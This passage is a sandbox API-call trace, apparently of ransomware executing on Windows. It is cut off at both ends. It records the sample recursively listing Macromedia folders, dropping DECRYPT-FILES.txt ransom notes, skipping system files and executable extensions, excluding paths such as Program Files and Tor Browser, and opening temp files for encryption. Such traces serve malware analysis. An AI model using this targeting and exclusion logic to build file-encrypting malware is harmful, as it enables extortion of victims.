Player\\macromedia.com\\") returned 85 [0180.432] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.432] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\DECRYPT-FILES.txt") returned 103 [0180.432] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.432] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0180.432] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0180.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.432] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.432] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.432] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.432] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.432] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeab4b80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.432] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.433] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.433] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.433] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.433] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.433] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.433] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 85 [0180.433] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.433] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0180.433] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\0a16c9.tmp" [0180.433] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.433] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.433] CloseHandle (hObject=0x0) returned 0 [0180.433] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.433] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.433] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.433] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="support", cAlternateFileName="")) returned 1 [0180.433] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0180.433] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0180.433] lstrcatW (in: lpString1="support", lpString2="\\" | out: lpString1="support\\") returned="support\\" [0180.434] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="support\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Program Files") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch=":\\Windows") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Games\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\All Users") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="AhnLab") returned 0x0 [0180.434] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0180.434] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.434] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\0a16c9.tmp") returned 104 [0180.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.435] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0180.435] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.435] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\DECRYPT-FILES.txt") returned 111 [0180.435] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0180.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*" [0180.436] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.436] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.436] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.436] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.436] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeab4b80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeab4b80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeab4b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.436] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.436] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.436] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.436] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.436] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.437] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.437] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0180.437] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.437] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0180.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\0a16c9.tmp" [0180.437] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.437] CloseHandle (hObject=0x0) returned 0 [0180.437] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.437] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.437] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.437] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="flashplayer", cAlternateFileName="FLASHP~1")) returned 1 [0180.437] lstrcmpW (lpString1="flashplayer", lpString2=".") returned 1 [0180.437] lstrcmpW (lpString1="flashplayer", lpString2="..") returned 1 [0180.437] lstrcatW (in: lpString1="flashplayer", lpString2="\\" | out: lpString1="flashplayer\\") returned="flashplayer\\" [0180.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="flashplayer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0180.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Program Files") returned 0x0 [0180.437] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch=":\\Windows") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Games\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\All Users") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="AhnLab") returned 0x0 [0180.438] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0180.438] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.438] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\0a16c9.tmp") returned 116 [0180.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.440] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0180.440] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.440] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\DECRYPT-FILES.txt") returned 123 [0180.440] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.440] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0180.440] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0180.440] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.441] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.441] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeeadace0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeadace0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, 